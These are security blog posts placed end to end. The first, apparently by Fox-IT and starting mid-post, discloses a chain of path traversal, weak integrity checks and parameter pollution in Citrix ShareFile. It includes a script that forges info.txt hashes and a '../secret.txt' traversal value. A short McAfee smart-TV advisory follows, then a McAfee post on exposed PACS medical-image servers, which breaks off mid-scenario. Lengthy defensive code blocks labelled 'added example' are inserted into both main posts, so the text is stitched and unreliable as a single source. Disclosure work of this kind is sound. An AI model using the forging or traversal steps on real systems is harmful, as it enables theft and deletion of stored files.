When a new upload was initialized, the URLs contained a parameter called uploadid. As the name indicates, this is the ID assigned to the upload; in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there is a folder for each upload, named after this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:

Info.txt

In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name and the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32-character uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond to the file ID for the upload and the folder ID to which the file is uploaded, respectively.

After trying for a while to figure out what kind of hashing algorithm was used for the integrity check of this file, it turned out to be a simple MD5 hash of the rest of the data in the info.txt file. The twist is that the data is encoded as UTF-16-LE, the default encoding for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import hashlib

# read the modified info.txt and drop the last field, which holds the (now stale) hash
with open('info_modified.txt', 'r') as infile:
    instr = infile.read().strip().split('|')
instr2 = u'|'.join(instr[:-1])
# the integrity value is an uppercase MD5 over the UTF-16-LE encoding of the remaining fields
outhash = hashlib.md5(instr2.encode('utf-16-le')).hexdigest().upper()
with open('info_out.txt', 'w') as outfile:
    outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as the temporary name for the file. The data that is uploaded is written to this file, and when the upload is finalized this file is added to the user's ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt, which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the file size of the secret.txt file we are trying to extract is 14 bytes instead of the 13 the modified info.txt indicated. We can upload a new info.txt file which does have the correct file size, and the secret.txt file is successfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we've turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we've only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the requested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is an h parameter which contains an HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<DownloadTokenID>dt6bbd1e278a634e1bbde9b94ff8460b24</DownloadTokenID>
<RequestType>single</RequestType>
<BaseUrl>https://redacted.sf-api.eu/</BaseUrl>
<ErrorUrl>https://redacted.sf-api.eu//error.aspx?type=storagecenter-downloadprep</ErrorUrl>
<StorageBasePath>\\s3\sf-eu-1\;</StorageBasePath>
<BatchID>dt6bbd1e278a634e1bbde9b94ff8460b24</BatchID>
<ZipFileName>tfile</ZipFileName>
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Metadata>
<Item key="operatingsystem" value="Linux" />
</Metadata>
<IrmEnabled>false</IrmEnabled>
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<Items>
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
</Items>
<Log>
<EventID>fif11465-ba81-8b77-7dd9-4256bc375017</EventID>
<UserID>c7add7af-91ac-4331-b48a-0aeed4a58687</UserID>
<OwnerID>c7add7af-91ac-4331-b48a-0aeed4a58687</OwnerID>
<AccountID>a4ea881a-a4d5-433a-fa44-41acd5ed5a5f</AccountID>
<UserEmailAddress>fox-it@redacted</UserEmailAddress>
<Name>tfile</Name>
<FileCount>1</FileCount>
<AdditionalInfo>fif11465-ba81-8b77-7dd9-4256bc375017</AdditionalInfo>
<FolderID>foh160ab-aa5a-4e43-96fd-e41caed36cea</FolderID>
<ParentID>foh160ab-aa5a-4e43-96fd-e41caed36cea</ParentID>
<Path>/root/a4ea881a-a4d5-433a-fa44-41acd5ed5a5f/foh160ab-aa5a-4e43-96fd-e41caed36cea</Path>
<IncrementDownloadCount>false</IncrementDownloadCount>
<ShareID />
</Log>
</ShareFileDownloadInfo>

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with tools such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML files integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not necessary for an attacker to calculate the signature at all, since the application simply tells you what the correct signature is if it doesn't match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended
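Both the info.txt check (an unkeyed MD5 over the UTF-16-LE record, vulnerability 2) and the token signature (a static secret prepended to the data and hashed with SHA-1, vulnerability 4) are fixed by the same thing: a MAC keyed with a secret generated per installation. The following added example (not Citrix's code) contrasts the unkeyed scheme reverse-engineered above with an HMAC-SHA256 tag over the same pipe-delimited record; the field order of the sample record is an assumption, the IDs are those shown in the post.

```python
import hashlib
import hmac
import secrets

# Constructed sample record in the pipe-delimited shape the post describes;
# the field order is an assumption, the IDs are the ones shown in the post.
SAMPLE_FIELDS = [
    'rsu-2351e6ffe2fc462492d0501414479b95',   # uploadid
    'fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90',   # file ID, also used as the temporary file name
    'fo9252b1-1f49-4024-aec4-6fe0c27ce1e6',   # folder ID
    'testfile.txt',                           # file name
    '13',                                     # file size in bytes
]


def legacy_tag(fields):
    """The check the post reverse-engineered: uppercase MD5 over the UTF-16-LE body, no key."""
    body = '|'.join(fields).encode('utf-16-le')
    return hashlib.md5(body).hexdigest().upper()


def legacy_verify(record):
    """Accepts any record whose last field is the MD5 of the rest: detects corruption, not tampering."""
    fields = record.split('|')
    return hmac.compare_digest(legacy_tag(fields[:-1]), fields[-1])


def keyed_tag(key, fields):
    """HMAC-SHA256 over the same body. Unlike sha1(secret || data), HMAC is not open to length
    extension, and the key is generated per installation rather than compiled into the binary."""
    body = '|'.join(fields).encode('utf-16-le')
    return hmac.new(key, body, hashlib.sha256).hexdigest().upper()


def keyed_write(key, fields):
    return '|'.join(fields + [keyed_tag(key, fields)])


def keyed_verify(key, record):
    fields = record.split('|')
    return hmac.compare_digest(keyed_tag(key, fields[:-1]), fields[-1])


def tamper(record, field_index, new_value, recompute_md5):
    """Model an attacker with write access to the storage folders: change one field, then either
    keep the old tag or recompute the unkeyed MD5 the way the post's script does."""
    fields = record.split('|')
    old_tag = fields.pop()
    fields[field_index] = new_value
    tag = legacy_tag(fields) if recompute_md5 else old_tag
    return '|'.join(fields + [tag])


def demo():
    key = secrets.token_bytes(32)   # per-installation key, created at install time and kept server-side
    legacy_record = '|'.join(SAMPLE_FIELDS + [legacy_tag(SAMPLE_FIELDS)])
    keyed_record = keyed_write(key, SAMPLE_FIELDS)
    # the post's third vulnerability: point the temporary file name at a different file
    escape = '../secret.txt'
    return {
        'legacy_accepts_original': legacy_verify(legacy_record),
        'legacy_accepts_forgery': legacy_verify(tamper(legacy_record, 1, escape, True)),
        'keyed_accepts_original': keyed_verify(key, keyed_record),
        'keyed_accepts_md5_forgery': keyed_verify(key, tamper(keyed_record, 1, escape, True)),
        'keyed_accepts_old_tag_forgery': keyed_verify(key, tamper(keyed_record, 1, escape, False)),
    }
```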

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation of this path taking place, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains an HMAC, which makes modifying this parameter seemingly impossible:

HMAC Url

However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the URL before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:

uploadid-double.png

We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values, separated by a comma. Only the first uploadid parameter is covered by the HMAC, since the check operates on the query string instead of the individual parameter values, and only verifies the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Pollution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)
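One way to verify a signed upload URL so that parameter pollution cannot slip past the MAC, as an added example (not the StorageZone controller's code): the vulnerable form checks only the raw text before &h=, while the hardened form parses first, rejects repeated names, and computes the MAC over a canonical encoding of every other parameter. The comma-joining of repeated parameters is modelled in Python, the key is a placeholder, and sign_query is an assumed server-side helper.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

SECRET = b'placeholder-storagezone-key'   # placeholder; a real deployment uses a per-installation secret


def canonical(params):
    """Deterministic encoding of the signed parameters: sorted by name, urlencoded."""
    return urlencode(sorted(params.items()))


def sign_query(params):
    """Server side (assumed helper): build a query string whose h= covers every parameter."""
    body = canonical(params)
    return body + '&h=' + hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()


def framework_params(query):
    """Model of the behaviour the post observed: a repeated name yields its values joined by a comma."""
    merged = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        merged[name] = merged[name] + ',' + value if name in merged else value
    return merged


def vulnerable_verify(query):
    """Checks only the text before '&h='; anything appended after the tag is never covered."""
    signed_part, _, rest = query.partition('&h=')
    tag = rest.split('&', 1)[0]
    expected = hmac.new(SECRET, signed_part.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return framework_params(query)


def hardened_verify(query):
    """Parse first, then check: no repeated names, exactly one h, MAC over all other parameters."""
    pairs = parse_qsl(query, keep_blank_values=True)
    names = [name for name, _ in pairs]
    if len(set(names)) != len(names):
        return None                       # parameter pollution: reject instead of merging
    params = dict(pairs)
    tag = params.pop('h', None)
    if tag is None:
        return None
    expected = hmac.new(SECRET, canonical(params).encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return params
```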

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attacker's account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.

Conclusion

By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML files integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick to follow up on the issues and roll out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown whether they were using the hybrid setup in a vulnerable configuration. Therefore, the number of affected installations, and whether these issues were abused, is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

New Vulnerabilities in Smart TVs Could Allow Hackers to Spy on Users

As recent events like CES and MWC have proved, the popularity of connected devices is showing no signs of slowing. Everything has been transformed into smart: lightbulbs, ovens, sprinkler systems – with one of the first trailblazers being the smart TV. And now, it’s been discovered that smart TVs may be vulnerable to cyberattacks, as the independent security software tester AV-Comparatives and sigma star gmbh informed the general public of several critical vulnerabilities in Vestel firmware, which is used in more than 30 popular TV brands, including Medion. These vulnerabilities could be leveraged to spy on smart TV users.

This discovery began back in March 2017 when news emerged that it may be possible to hack into smart TVs to spy on users. Hearing this news, AV-Comparatives decided to perform a quick security check on the Medion smart TV and discovered a handful of vulnerabilities. AV-Comparatives asked sigma star gmbh (which specializes in IoT) to analyze these issues, and the company confirmed their severity. And though the groups informed Vestel and Medion already about these flaws, not all have been addressed.

Now, Medion has requested to further investigate a few outstanding vulnerabilities, which means a firmware update is not on the way just yet. So, in the interim, be sure to follow these security tips to ensure you stay secure while utilizing smart TVs:

  • Buy smart TVs with security in mind. When purchasing a smart TV, it’s always important to do your homework and read up on any current vulnerabilities. That way, you can make an informed purchase.
  • Update regularly. It’s an important security rule of thumb: always update any software whenever an update is available, as security patches are usually included with each new version. And even though fixes for these particular flaws have not been issued yet, they should be soon on the way. 
  • Secure your home’s internet at the source. Smart TVs, like all connected devices, have to connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose your network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post New Vulnerabilities in Smart TVs Could Allow Hackers to Spy on Users appeared first on McAfee Blogs.

McAfee Researchers Find Poor Security Exposes Medical Data to Cybercriminals

The nonperishable nature of medical data makes an irresistible target for cybercriminals. The art of hacking requires significant time and effort, encouraging experienced cybercriminals to plot their attacks based on the return they will see from their investment. Those who have successfully gained access to medical data have been well rewarded for their efforts. One seller stated in an interview that “someone wanted to buy all the … records specifically,” claiming that the effort had netted US$100,000.

While at a doctor’s appointment with my wife watching a beautiful 4D ultrasound of our unborn child, I noticed the words “saving data to image” flash on the screen. Although this phrase would not catch the attention of most people, given my research on how cybercriminals are targeting the health care industry, I quickly began to wonder why an ultrasound of our child would not instead save to a file. Intrigued, I decided to dig into the world of medical imaging and its possible security risks. The results were disturbing; ultimately, we were able to combine attack vectors to reconstruct body parts from the images and make a three-dimensional model.

PACS

Most hospitals or medical research facilities use PACS, for picture archiving and communication system, so that images such as ultrasounds, mammograms, MRIs, etc. can be accessed from the various systems within their facility, or through the cloud.

A PACS setup contains multiple components, including a workstation, imaging device, acquisition gateway, PACS controller, database, and archiving—as illustrated in the following graphic:

The basic elements of PACS infrastructure.

The imaging device creates a picture, such as an ultrasound or MRI, which is uploaded to an acquisition gateway. Because much of the imaging equipment in use by medical facilities does not align with security best practices, acquisition gateways are placed in the network to enable the digital exchange of the images. The acquisition gateway also often acts as the server connecting to the hospital’s information system (using the HL7 protocol) to enrich images with patient data.

The PACS controller is the central unit coordinating all traffic among the different components. The final component in the PACS infrastructure is the database and archiving system. The system ensures that all images are correctly stored and labeled for either short- or long-term storage.

Larger implementations might have multiple imaging devices and acquisition gateways in various locations, connected over the Internet. During our investigation, we noticed many small medical practices around the world using free, open-source PACS software, which was not always securely implemented.

How many PACS servers appear to be connected depends on how you search using Shodan, a search engine for finding specific types of computers connected to the Internet. Some servers connect over TCP 104; others use HTTP on TCP 80 or HTTPS on TCP 443. A quick search revealed more than 1,100 PACS directly connected to the Internet, not behind a recommended layer of network security measures or virtual private networks (VPNs).

PACS systems connected to the Internet. Darker colors represent more systems.

Our eyebrows began to rise very early in our research, as we came across “IE 6 support only” messages or ActiveX controls and old Java support; many of these products are vulnerable to a plethora of exploits. For example, one of the PACS generated an error page when we changed one parameter. This is a very basic, common way of testing whether the application developers performed proper input sanitization checks to prevent attackers from inserting code or generating failures that could reveal data about the application and give clues to compromising the system.

A stack-trace error.

The stack-trace dump revealed the use of Apache Tomcat Version 7.0.13, which has more than 40 vulnerabilities.

When communicating with the DICOM (digital imaging and communications in medicine) port, TCP 104, it is possible to grab the banner of a server and get a response. As we queried, we recorded different responses. Let’s look at one:

\x02\x00\x00\x00\x00\xbe\x00\x01\x00\x00ANY-SCP         FINDSCU         \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x151.2.840.10008.3.1.1.1!\x00\x00\x1b\x01\x00\x00\x00@\x00\x00\x131.2.840.10008.1.2.1P\x00\x00>Q\x00\x00\x04\x00\x00@\x00R\x00\x00"1.2.826.0.1.3680043.2.135.1066.101U\x00\x00\x0c1.4.16/WIN32

 

The FINDSCU string refers to the findscu tool, which can be used to query a PACS system. The DICOM standard defines three data models for the query/retrieve service. Each data model has been assigned with one unique ID for the C-FIND, one for the C-MOVE, and one for C-GET; so all together there are nine unique IDs, three for each model. In the preceding banner, we retrieved two of those IDs:

  • 1.2.840.10008.1.2.1: A transfer syntax unique ID that defines the value “Explicit VR Little Endian” for data transfer
  • 1.2.826.0.1.3680043.2.135.1066.101: A value referring to the implementation class

Another value in the banner, “1.4.16/WIN32,” refers to the implementation version. In the context of the medical servers, this refers to the version of XAMPP, aka Apache with MariaDB, PHP, and Perl. This server was running Apache 2.4.9, which is publicly known to contain nine vulnerabilities.
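Reading those fields off the banner by hand is error-prone; the following added example (not the researchers' tooling) decodes the banner as the DICOM A-ASSOCIATE-AC PDU it is, walking the variable items to recover the AE titles, the accepted transfer syntax, the maximum PDU length, the implementation class UID and the implementation version name. The banner bytes are the ones shown above, re-typed as a Python literal.

```python
import struct

# The banner captured above, as a bytes literal (PDU type 0x02 = A-ASSOCIATE-AC, length 0xbe = 190).
BANNER = (
    b'\x02\x00\x00\x00\x00\xbe\x00\x01\x00\x00'
    + b'ANY-SCP'.ljust(16) + b'FINDSCU'.ljust(16) + b'\x00' * 32
    + b'\x10\x00\x00\x151.2.840.10008.3.1.1.1'
    + b'!\x00\x00\x1b\x01\x00\x00\x00@\x00\x00\x131.2.840.10008.1.2.1'
    + b'P\x00\x00>Q\x00\x00\x04\x00\x00@\x00'
    + b'R\x00\x00"1.2.826.0.1.3680043.2.135.1066.101'
    + b'U\x00\x00\x0c1.4.16/WIN32'
)


def parse_items(buf):
    """Walk a run of DICOM variable items: type (1 byte), reserved (1), length (2, big-endian), value."""
    items, pos = [], 0
    while pos + 4 <= len(buf):
        item_type, length = struct.unpack('>BxH', buf[pos:pos + 4])
        value = buf[pos + 4:pos + 4 + length]
        if len(value) != length:
            raise ValueError('truncated item 0x%02x' % item_type)
        items.append((item_type, value))
        pos += 4 + length
    if pos != len(buf):
        raise ValueError('trailing bytes after last item')
    return items


def uid(value):
    """UIDs and names are ASCII, padded with NUL or space to an even length."""
    return value.decode('ascii').rstrip('\x00 ')


def parse_associate_ac(pdu):
    """Decode an A-ASSOCIATE-AC PDU into the fields an inventory of exposed PACS would record."""
    if len(pdu) < 6:
        raise ValueError('short PDU')
    pdu_type, length = struct.unpack('>BxI', pdu[:6])
    if pdu_type != 0x02:
        raise ValueError('not an A-ASSOCIATE-AC (type 0x%02x)' % pdu_type)
    body = pdu[6:6 + length]
    if len(body) != length:
        raise ValueError('PDU length field exceeds data received')
    # fixed header: protocol version (2), reserved (2), called AE (16), calling AE (16), reserved (32)
    result = {
        'protocol_version': struct.unpack('>H', body[0:2])[0],
        'called_ae': body[4:20].decode('ascii').rstrip(),
        'calling_ae': body[20:36].decode('ascii').rstrip(),
        'application_context': None,
        'transfer_syntaxes': [],          # (presentation context id, result, transfer syntax UID)
        'max_pdu_length': None,
        'implementation_class_uid': None,
        'implementation_version_name': None,
    }
    for item_type, value in parse_items(body[68:]):
        if item_type == 0x10:             # application context
            result['application_context'] = uid(value)
        elif item_type == 0x21:           # presentation context (AC): id, reserved, result, reserved, sub-items
            ctx_id, res = value[0], value[2]
            for sub_type, sub_value in parse_items(value[4:]):
                if sub_type == 0x40:      # accepted transfer syntax
                    result['transfer_syntaxes'].append((ctx_id, res, uid(sub_value)))
        elif item_type == 0x50:           # user information
            for sub_type, sub_value in parse_items(value):
                if sub_type == 0x51:
                    result['max_pdu_length'] = struct.unpack('>I', sub_value)[0]
                elif sub_type == 0x52:
                    result['implementation_class_uid'] = uid(sub_value)
                elif sub_type == 0x55:
                    result['implementation_version_name'] = uid(sub_value)
    return result
```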

In other cases, there was no need to search for vulnerabilities. The management interface was wide open and could be accessed without credentials.

What does this mean? It is possible to access the images.

Vulnerabilities

In addition to expensive commercial PACS systems, open-source or small-fee PACS are available for small health care institutions or practices. As we investigated these systems, we found that our fears were well founded. One web server/client setup used the defaults “admin/password” as credentials without enforcing a change when the server is started for the first time. We found more problems:

  • Unencrypted traffic between client and server
  • Click jacking
  • Cross-site scripting (reflected)
  • Cross-site scripting stored as cross-site request forgery
  • Document object model–based link manipulation
  • Remote creation of admin accounts
  • Disclosure of information

Many of these are ranked on the OWASP Top 10 Most Critical Web Application Security Risks list, which highlights severe flaws that should be addressed in any product delivered to a customer.

We have reported the vulnerabilities we discovered to these vendors following our responsible disclosure process. They cooperated with us in investigating the vulnerabilities and taking appropriate actions to fix the issues.

But why should we spend so much time and effort in researching vulnerabilities when there are many other ways to retrieve medical images from the Internet?

Medical Image Formats

The medical world uses several image formats for different purposes. Each format has different requirements and works with different equipment, protocols, etc. A few format examples:

  • NIfTI: Neuroimaging Informatics Technology Initiative
  • DICOM: Digital Imaging and Communications in Medicine
  • MINC: Medical Imaging NetCDF
  • NRRD: Nearly Raw Raster Data

Searching open directories and FTP servers while using several search engines, we gathered thousands of images—some of them complete MRI scans, mostly in DICOM format. One example:

An open directory of images.

The DICOM format originated in the 1980s, before cybersecurity was a key component. The standard format contains a detailed list of tags such as patient name, station name, hospital, etc. All are included as metadata with the image.

Opening an image with a text editor presents the following screen:

An example of the DICOM file format.

After a 128-byte preamble, the file carries the four-byte prefix DICM, an indicator that we are dealing with a DICOM file. Other (now obscured) strings in this example include the hospital's name, city, patient name, and more.

The Health Insurance Portability and Accountability Act requires a secure medical imaging workflow, which includes the removal or anonymizing of metadata in DICOM files. Researching the files retrieved from open sources and directories, we discovered that most of the images still contained this metadata, as in the following example, from which we extracted (obscured) personally identifiable information (PII).

Metadata discovered in a DICOM file.
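The two checks described above, looking for the DICM prefix and pulling the identifying tags out of the metadata, can be done without a DICOM library. The following is an added example written for this page (not McAfee's code): it builds a small, constructed Part 10 file in memory (not a real scan), walks its explicit VR little endian elements, reports the PII tags it finds and then scrubs them in place without changing any length. The PII tag list is deliberately short; a real de-identification pass follows the DICOM PS3.15 confidentiality profile, which covers far more attributes.

```python
import struct

EXPLICIT_VR_LE = "1.2.840.10008.1.2.1"
# VRs whose length field is 4 bytes after 2 reserved bytes in explicit VR encoding
LONG_VRS = {b"OB", b"OW", b"OF", b"SQ", b"UT", b"UN"}
# Tags this example treats as PII (tag numbers from the DICOM data dictionary)
PII_TAGS = {
    (0x0008, 0x0080): "InstitutionName",
    (0x0008, 0x0081): "InstitutionAddress",
    (0x0008, 0x1010): "StationName",
    (0x0010, 0x0010): "PatientName",
    (0x0010, 0x0020): "PatientID",
    (0x0010, 0x0030): "PatientBirthDate",
}


def element(group, elem, vr, value):
    """Encode one explicit VR little endian data element (values padded to even length)."""
    if len(value) % 2:
        value += b"\x00" if vr in (b"UI", b"OB") else b" "
    tag = struct.pack("<HH", group, elem)
    if vr in LONG_VRS:
        return tag + vr + b"\x00\x00" + struct.pack("<I", len(value)) + value
    return tag + vr + struct.pack("<H", len(value)) + value


# A constructed minimal DICOM Part 10 file: 128-byte preamble, "DICM" prefix,
# file meta group, then a few dataset elements. Names and values are made up.
SAMPLE_DICOM = (
    b"\x00" * 128 + b"DICM"
    + element(0x0002, 0x0001, b"OB", b"\x00\x01")                 # FileMetaInformationVersion
    + element(0x0002, 0x0010, b"UI", EXPLICIT_VR_LE.encode())     # TransferSyntaxUID
    + element(0x0008, 0x0080, b"LO", b"St. Example Hospital")
    + element(0x0008, 0x1010, b"SH", b"CT01")
    + element(0x0010, 0x0010, b"PN", b"DOE^JANE")
    + element(0x0010, 0x0020, b"LO", b"123456")
    + element(0x0010, 0x0030, b"DA", b"19700101")
    + element(0x0018, 0x0015, b"CS", b"KNEE")                     # BodyPartExamined, not PII
    + element(0x7FE0, 0x0010, b"OB", b"\x00\x00\x00\x00")         # PixelData (dummy)
)


def is_dicom(data):
    """Part 10 files carry 'DICM' at offset 128, after the preamble, not at offset 0."""
    return len(data) >= 132 and data[128:132] == b"DICM"


def iter_elements(data, start=132):
    """Yield (tag, vr, value_offset, length) for explicit VR little endian elements."""
    pos = start
    while pos + 8 <= len(data):
        group, elem = struct.unpack("<HH", data[pos:pos + 4])
        vr = data[pos + 4:pos + 6]
        if vr in LONG_VRS:
            length = struct.unpack("<I", data[pos + 8:pos + 12])[0]
            value_off = pos + 12
        else:
            length = struct.unpack("<H", data[pos + 6:pos + 8])[0]
            value_off = pos + 8
        if length == 0xFFFFFFFF:
            raise ValueError("undefined-length element at offset %d is not handled here" % pos)
        if value_off + length > len(data):
            raise ValueError("element at offset %d runs past the end of the file" % pos)
        yield (group, elem), vr, value_off, length
        pos = value_off + length


def find_pii(data):
    """Return {name: value} for every PII tag present in the file."""
    if not is_dicom(data):
        raise ValueError("missing 128-byte preamble + DICM prefix")
    found = {}
    for tag, vr, off, length in iter_elements(data):
        value = data[off:off + length]
        if tag == (0x0002, 0x0010) and value.decode("ascii").strip(" \x00") != EXPLICIT_VR_LE:
            raise ValueError("only Explicit VR Little Endian datasets are handled here")
        if tag in PII_TAGS:
            found[PII_TAGS[tag]] = value.decode("ascii", "replace").strip(" \x00")
    return found


def scrub_pii(data):
    """Overwrite PII values in place, keeping every length unchanged so no offset
    or group length in the file shifts; dates get a valid dummy DA value."""
    out = bytearray(data)
    for tag, vr, off, length in iter_elements(data):
        if tag in PII_TAGS and length:
            filler = b"19000101" if vr == b"DA" else b"ANON"
            out[off:off + length] = filler.ljust(length, b" ")[:length]
    return bytes(out)
```

Keeping the value lengths fixed is what makes the in-place rewrite safe: the element headers, the pixel data offset and any group-length elements stay valid, so the scrubbed file still opens in a viewer.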

Combining Vulnerabilities and Metadata

We combined possible vulnerabilities and the metadata to create a test scenario, loading a dummy patient record, including an x-ray picture of a knee, onto the vulnerable PACS server.

Our test patient record, followed by an x-ray of a knee. 

